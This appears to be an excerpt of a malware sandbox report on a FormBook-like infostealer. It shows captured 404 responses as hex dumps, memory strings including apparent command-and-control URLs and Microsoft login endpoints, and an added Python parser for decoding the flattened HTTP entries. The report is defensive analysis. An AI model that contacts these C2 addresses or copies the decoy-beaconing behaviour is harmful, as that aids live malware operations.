71 5d 59 6b e1 e6 ae 05 74 06 c2 c8 f3 cf 37 70 3d f9 57 3b 5f b1 62 14 4e 13 f4 fb 6d af 6b 93 cb 78 5b bb e2 f2 96 22 eb 13 a6 7e 1d c4 7d 58 b9 49 79 03 e6 bb 25 61 c0 8e 7e 70 a5 30 7d 73 65 0a ff c4 d0 ae f5 71 03 fd c5 8e f7 59 55 65 c9 c3 a0 c7 f1 c6 6c 2f af 2b 5b 42 47 d7 8b 57 92 78 07 ff 56 0c bd ba ef 1d d7 ce 0a ab d7 df c3 00 84 14 b7 e8 83 d0 7b 44 af 12 07 f1 88 61 af b4 f1 29 9e 87 20 6b dc e2 ca be de 93 f1 e0 65 76 5d 7e be 6c 81 38 d3 dc 7a ce 2b 11 18 3d 22 a8 d1 1b 81 57 44 7c 6e c5 af 71 ed 23 45 fd 82 18 eb f8 46 37 df 3d 2d 4c 2f 31 fb 83 98 17 87 65 75 7f 49 2b bd c1 a7 ee 20 ab ab 32 04 01 a1 ff 78 23 bf 57 e4 2b 75 37 c1 f8 bb 79 5d cd bf 71 0b 68 8a c3 1b b2 bc 38 eb fd ab 8f 8c ef 31 5c 34 6d c5 a1 0f 94 6c 83 1b 82 5b bc ad bf 81 fc 7a e3 37 2f 46 ff 11 a6 4b c2 05 39 ea b3 18 d6 07 82 fb 30 b1 fc 5b 35 7e 67 ea d3 d8 7b 39 da df 72 40 82 ba e5 af cf b9 ed 4b 7e dc 67 b1 f3 c6 45 2f c7 6b 2e 7f 94 41 9b 15 ce fd 1e d8 48 04 72 54 ff e7 de 8a e3 f7 00 7e 89 2b 90 d4 81 71 0f 80 ac 40 96 b8 0d 09 9
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Wed, 20 Nov 2024 07:33:31 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 34 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 3a e9 72 e2 5a 7a ff ef 53 10 a7 92 cc 94 da ad 15 10 1e bb 67 b4 21 09 90 90 04 02 44 2a 75 4b bb 84 56 b4 c3 54 1e 28 af 91 27 cb 11 b6 db 98 b6 6f f7 a4 f2 23 a7 7f 18 9d e5 db 97 d3 df 77 7e fb ed b7 c7 7f 62 97 cc da 50 b8 41 50 25 f1 b7 df 1e 9f ff 0c c0 78 0c 5c d3 f9 f6 db e5 67 e2 56 26 d8 51 e5 f7 ee b1 0e 9b a7 3b 26 4b 2b 37 ad ee ab 53 ee de 0d ec e7 af a7 bb ca ed 2a b8 07 f1 97 81 1d 98 45 e9 56 4f 75 e5 dd 93 77 9f c2 31 ed c0 bd ef cf 17 59 7c 05 28 cd ee ed 7e e9 d3 83 4a 61 fa 89 f9 8f 9c e0 ba 3c 2c dc f2 ea 08 f2 0e 7a 6a 26 ee d3 5d 13 ba 6d 9e 15 d5 d5 b6 36 74 aa e0 c9 71 9b d0 76 ef 2f 1f 5f 06 61 1a 56 a1 19 df 97 b6 19 bb 4f e8 d7 ef a0 aa b0 8a dd 6f 04 42 0c e4 ac 1a 4c b3 3a 75 1e e1 e7 c9 67 51 96 d5 29 76 07 bd dc 5e c4 65 97 e5 0b 1d bd a8 ad cc 39 0d fe 7e d9 da 7f f6 c3 03 d2 b9 f7 cc 24 8c 4f 0f 03 aa 00 68 bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 1e 2b c3 b3 fb 30 40 89 bc 7b bf 18 87 a9 7b 1f b8 a1 1f 54 60 f9 2b 81 91 c3 31 4a 60 93 f7 bb 2c d3 8e fc a2 e7 01 a8 28 ce 8a 87 c1 3f 7b 97 f1 7e db eb 1a 36 c5 31 1c 79 bf 96 9b 8e 13 a6 fe c3 e0 66 3e 31 0b 3f 4c df 4d ff e7 77 f2 4b d7 ae c2 2c fd 02 58 cf 2a b7 b8 91 87 13 96 79 6c 02 59 58 71 66 47 ff 07 e8 be f6 f6 67 02 89 dc 62 7a 26 f2 3e 76 3d 20 25 b3 ae b2 f7 c8 5e 96 8b 67 29 fe b8 fe c6 fb 00 45 ae 35 f0 c6 e9 57 60 91 79 96 96 ee 7d 98 7a d9 0d a3 af 72 65 2e e3 0d f7 d5 f1 b2 32 ab ba 04 da 71 dc 9b c3 17 ab 79 56 ff 10 41 fe e5 8f 4e 17 ae 59 66 e9 e7 e7 b1 e1 f5 f9 de 24 3f 53 c1 15 65 17 99 da d5 85 af 2f df 35 0b f8 ed 71 dd f7 81 e2 06 e1 2b b7 c8 65 7c 48 6f 6f 4b bd 61 00 c7 fb 40 
5c 57 d6 5a b8 b9 6b 02 9d 81 30 f2 fc f3 0d 5c 4f fe d5 ce 57 ac d8 04 a7 08 ea fd b6 d7 b5 e9 65 bc ad 5d 71 79 4b 91 f9 09 53 bf 0e e2 3e ac dc a4 bc 01 f3 dd 92 30 60 47 3f b8 52 98 be b9 f2 04 ff c4 d0 ae f5 71 03 fd c5 8e ad ac aa b2 e4 61 d0 e3 78 63 b6 97 d7 95 2d a1 a3 eb c5 2b 49 bc 83 7f 2b 86 5e dd f7 8e 6b 67 85 d9 eb ef 61 00 42 8a 5b f4 41 e8 3d a2 57 89 83 78 44 33 57 da f8 14 cf 43 90 35 6e 71 65 5f ef c9 78 f0 32 bb 2e 3f 5f 36 41 9c 69 6e 3d e7 95 08 8c 1a 11 93 d1 1b 81 57 44 7c 6e c5 af 71 ed 23 45 fd 82 18 eb f8 46 37 df 3d 2d 4c 2f 31 fb 83 98 17 87 65 75 7f 49 2b bd c1 a7 ee 20 ab ab 32 04 01 a1 ff 78 23 bf 57 e4 2b 75 37 c1 f8 bb 79 5d cd bf 71 0b 68 8a c3 1b b2 bc 38 eb fd ab 8f 8c ef 31 5c 34 6d c6 a1 0f 94 6c 83 1b 82 5b bc ad bf 81 fc 7a e3 37 2f 46 ff 11 a6 4b c2 05 39 ea b3 18 d6 07 82 fb 30 31 fd 5b 35 7e 67 ea d3 d8 7b 39 da df 72 40 82 ba e5 af cf b9 ed 4b 7e b4 b2 d8 79 e3 a2 97 e3 35 97 3f ca a0 cd 0a e7 de 02 36 12 81 1c d5 ff b9 37 e3 f8 3d 80 5f e2 0a 24 75 60 dc 03 20 2b 90 25 6e 43 c2 e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkeddate: Wed, 20 Nov 2024 07:33:34 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 32 37 37 35 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 
3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20
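The entries above are hard to read as reproduced here: the report has stripped the CRLFs from each response, so every header name is glued to the tail of the previous value ("closeServer: Apache", "GMTserver: LiteSpeed"), and "Data Raw" is only a fixed-length hex prefix of the body, which for the LiteSpeed entries is a chunked, gzip-compressed page that cannot be read by eye. A run of 404s from unrelated hosting stacks (Apache, Cloudflare, nginx, LiteSpeed) is what FormBook's beaconing looks like, since the family cycles through a list of decoy domains alongside its live C2, so an analyst usually wants to recover exactly which response each host sent. The parser below is an added example, not Joe Sandbox code: it pulls one flattened entry back into a status line, a header map and a decoded body, undoes chunking and gzip where the headers say so, and flags when the dump is a prefix of the real response. The list of expected header names is an assumption used to peel glued names apart; the sample lines are constructed in the report's format with bodies built inline.

```python
"""Decode one flattened Joe Sandbox "HTTP traffic detected" entry.

Added example, not code from Joe Sandbox. The report strips the CRLFs from
the response, so each header name is glued onto the end of the previous
value ("closeServer: Apache"), and "Data Raw" holds only a hex prefix of the
body. This parser peels the headers apart, decodes the hex, undoes chunked
transfer-encoding and gzip where the headers say so, and flags truncation.
"""
import re
import zlib
import gzip  # only used to build the constructed sample below

# Assumption: header names expected in these dumps (lowercase). The parser
# strips the longest known name off the end of each "xxxName: " token.
KNOWN_HEADERS = {
    "date", "server", "content-type", "content-length", "content-encoding",
    "transfer-encoding", "connection", "last-modified", "accept-ranges", "vary",
    "cache-control", "pragma", "keep-alive", "x-turbo-charged-by",
    "cf-cache-status", "cf-ray", "report-to", "nel", "alt-svc", "server-timing",
    "x-rate-limit-limit", "x-rate-limit-remaining", "x-rate-limit-reset",
}
TOKEN_RE = re.compile(r"([A-Za-z0-9-]+): ")
CAMEL_RE = re.compile(r"(?<=[a-z0-9])(?=[A-Z])")


def _split_glued(token):
    """'GMTContent-Type' -> ('GMT', 'Content-Type')."""
    low = token.lower()
    known = [n for n in KNOWN_HEADERS if low.endswith(n)]
    if known:
        cut = len(token) - max(map(len, known))
        return token[:cut], token[cut:]
    bounds = list(CAMEL_RE.finditer(token))     # fallback: last case boundary
    if bounds:
        cut = bounds[-1].start()
        return token[:cut], token[cut:]
    return "", token


def _hex_to_bytes(raw):
    # The dump is cut at a fixed length and may end in a half byte ("c2 e").
    return bytes.fromhex("".join(t for t in raw.split() if len(t) == 2))


def _dechunk(data):
    """Return (payload, truncated) for a chunked body that may be cut short."""
    out, pos = bytearray(), 0
    while True:
        nl = data.find(b"\r\n", pos)
        if nl < 0:
            return bytes(out), True
        try:
            size = int(data[pos:nl].split(b";")[0], 16)
        except ValueError:
            return bytes(out), True
        if size == 0:
            return bytes(out), False            # terminating chunk seen
        chunk = data[nl + 2:nl + 2 + size]
        out += chunk
        if len(chunk) < size:
            return bytes(out), True             # dump ended mid-chunk
        pos = nl + 2 + size + 2                 # skip the chunk's CRLF


def _gunzip(data):
    d = zlib.decompressobj(16 + zlib.MAX_WBITS)  # gzip wrapper
    return d.decompress(data), not d.eof         # partial input -> prefix only


def parse_entry(line):
    text = line.strip().split("HTTP traffic detected: ", 1)[-1]
    ascii_preview = raw_hex = None
    if "Data Ascii: " in text:
        text, ascii_preview = text.split("Data Ascii: ", 1)
    if "Data Raw: " in text:
        text, raw_hex = text.split("Data Raw: ", 1)

    status, headers, name, pos = None, {}, None, 0
    for m in TOKEN_RE.finditer(text):
        glue, next_name = _split_glued(m.group(1))
        value = (text[pos:m.start()] + glue).strip()
        if status is None:
            status = value                      # "HTTP/1.1 404 Not Found"
        else:
            headers[name] = value
        name, pos = next_name, m.end()
    if name is not None:
        headers[name] = text[pos:].strip()

    body, truncated = "", False
    if raw_hex is not None:
        h = {k.lower(): v for k, v in headers.items()}
        data = _hex_to_bytes(raw_hex)
        if h.get("transfer-encoding", "").lower() == "chunked":
            data, truncated = _dechunk(data)
        elif h.get("content-length", "").isdigit():
            truncated = len(data) < int(h["content-length"])
        if h.get("content-encoding", "").lower() == "gzip":
            data, gz_truncated = _gunzip(data)
            truncated = truncated or gz_truncated
        body = data.decode("utf-8", errors="replace")
    return {"status": status, "headers": headers, "body": body,
            "truncated": truncated, "ascii_preview": ascii_preview}


# Constructed samples in the report's flattened format (not taken from the page).
def make_line(header_blob, body_bytes):
    return ("Source: global trafficHTTP traffic detected: " + header_blob +
            "Data Raw: " + " ".join(f"{b:02x}" for b in body_bytes))

SAMPLE_HTML = b"<!DOCTYPE html><html><head><title>404 Not Found</title></head><body>404</body></html>"
_gz = gzip.compress(SAMPLE_HTML, mtime=0)
_chunked = b"%x\r\n" % len(_gz) + _gz + b"\r\n0\r\n\r\n"
LITESPEED_HEADERS = ("HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/html"
                     "transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encoding"
                     "date: Wed, 20 Nov 2024 07:33:26 GMTserver: LiteSpeedconnection: close")
SAMPLE_GZIP_LINE = make_line(LITESPEED_HEADERS, _chunked)
SAMPLE_GZIP_CUT_LINE = make_line(LITESPEED_HEADERS, _chunked[: len(_chunked) // 2])
APACHE_HEADERS = ("HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 07:32:21 GMTContent-Type: text/html"
                  "Content-Length: 19268Connection: closeServer: ApacheLast-Modified: "
                  "Tue, 25 Jan 2022 07:25:35 GMTAccept-Ranges: bytes")
SAMPLE_APACHE_LINE = ("Source: global trafficHTTP traffic detected: " + APACHE_HEADERS +
                      "Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c"
                      " 20 6c 61 6e 67 3d 22 6a 61 22 3e 0")   # trailing half byte, as in the dumps

if __name__ == "__main__":
    for sample in (SAMPLE_GZIP_LINE, SAMPLE_GZIP_CUT_LINE, SAMPLE_APACHE_LINE):
        r = parse_entry(sample)
        print(r["status"], r["headers"].get("server") or r["headers"].get("Server"),
              "truncated" if r["truncated"] else "complete", repr(r["body"][:40]))
```

Two design points. The glued-name problem is only solvable with a vocabulary: "closecache-control" could be one header name as far as the grammar goes, so the parser takes the longest known suffix and falls back to a lower-to-upper case boundary for names it has not seen, which is what separates "5sX-Rate-Limit-Remaining" correctly. Truncation is reported from three independent signals (body shorter than Content-Length, a chunk cut short, a gzip stream with no end-of-stream marker) because the dump length is fixed by the sandbox, not by the server, and a decoded prefix of a 404 page should never be mistaken for the whole response.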
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 07:33:39 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 07:33:42 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 07:33:44 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 07:33:47 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TuserDate: Wed, 20 Nov 2024 07:33:54 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TuserDate: Wed, 20 Nov 2024 07:33:57 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TuserDate: Wed, 20 Nov 2024 07:33:59 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TuserDate: Wed, 20 Nov 2024 07:34:02 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 07:35:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Wed, 20 Nov 2024 07:35:14 GMTVary: Accept-EncodingCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 8e56c31b9a5572ad-EWRContent-Encoding: gzipserver-timing: cfL4;desc="?proto=TCP&rtt=1873&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=828&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 07:35:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Wed, 20 Nov 2024 07:35:17 GMTVary: Accept-EncodingCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 8e56c32b7e48c337-EWRContent-Encoding: gzipserver-timing: cfL4;desc="?proto=TCP&rtt=1452&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=852&delivery_rate=0&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 07:35:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Wed, 20 Nov 2024 07:35:19 GMTVary: Accept-EncodingCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 8e56c33b6aa5c439-EWRContent-Encoding: gzipserver-timing: cfL4;desc="?proto=TCP&rtt=1499&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1865&delivery_rate=0&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 07:35:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Wed, 20 Nov 2024 07:35:22 GMTVary: Accept-EncodingCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 8e56c34b793d7291-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1809&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=560&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Ascii: 93<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0</center></body></html>0
                Source: rasautou.exe, 00000004.00000002.4614264307.0000000005B08000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.0000000003928000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://assets.lolipop.jp/img/bnr/bnr_lolipop_ad_001.gif
                Source: rasautou.exe, 00000004.00000002.4614264307.00000000062E2000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.0000000004102000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
                Source: rasautou.exe, 00000004.00000002.4614264307.0000000005B08000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.0000000003928000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://js.ad-stir.com/js/adstir.js?20130527
                Source: nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.00000000045B8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.madhf.tech/vpqb/?GR54yHZ8=idKeckLAh2QIGB9KZJIRJS/oZMGdTwW1FjmI9FLM0wQU5zssjU3Tb8uAKfYmb7P
                Source: nBMWUKLuWlMJko.exe, 00000006.00000002.4613324935.0000000002DD6000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nonpressure.beauty
                Source: nBMWUKLuWlMJko.exe, 00000006.00000002.4613324935.0000000002DD6000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nonpressure.beauty/ymqd/
                Source: rasautou.exe, 00000004.00000002.4616647777.0000000007E7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: rasautou.exe, 00000004.00000002.4616647777.0000000007E7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: rasautou.exe, 00000004.00000002.4614264307.0000000006474000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.0000000004294000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
                Source: rasautou.exe, 00000004.00000002.4616647777.0000000007E7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: rasautou.exe, 00000004.00000002.4616647777.0000000007E7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: rasautou.exe, 00000004.00000002.4616647777.0000000007E7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: rasautou.exe, 00000004.00000002.4616647777.0000000007E7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: rasautou.exe, 00000004.00000002.4616647777.0000000007E7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: rasautou.exe, 00000004.00000002.4614264307.0000000006C4E000.00000004.10000000.00040000.00000000.sdmp, rasautou.exe, 00000004.00000002.4616494626.0000000007B20000.00000004.00000800.00020000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.0000000004A6E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://kb.fastpanel.direct/troubleshoot/
                Source: rasautou.exe, 00000004.00000002.4606460151.00000000031B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: rasautou.exe, 00000004.00000002.4606460151.0000000003191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: rasautou.exe, 00000004.00000003.2510041417.0000000007E5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: rasautou.exe, 00000004.00000002.4606460151.00000000031B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: rasautou.exe, 00000004.00000002.4606460151.0000000003191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033YEf
                Source: rasautou.exe, 00000004.00000002.4606460151.00000000031B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: rasautou.exe, 00000004.00000002.4606460151.0000000003191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: rasautou.exe, 00000004.00000002.4614264307.0000000005B08000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.0000000003928000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lolipop.jp/
                Source: rasautou.exe, 00000004.00000002.4614264307.0000000005B08000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.0000000003928000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://minne.com/?utm_source=lolipop&utm_medium=banner&utm_campaign=synergy&utm_content=404
                Source: rasautou.exe, 00000004.00000002.4614264307.0000000005B08000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.0000000003928000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://pepabo.com/
                Source: rasautou.exe, 00000004.00000002.4614264307.0000000005B08000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.0000000003928000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://static.minne.com/files/banner/minne_600x500
                Source: rasautou.exe, 00000004.00000002.4614264307.0000000005B08000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.0000000003928000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://support.lolipop.jp/hc/ja/articles/360049132953
                Source: rasautou.exe, 00000004.00000002.4616647777.0000000007E7B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
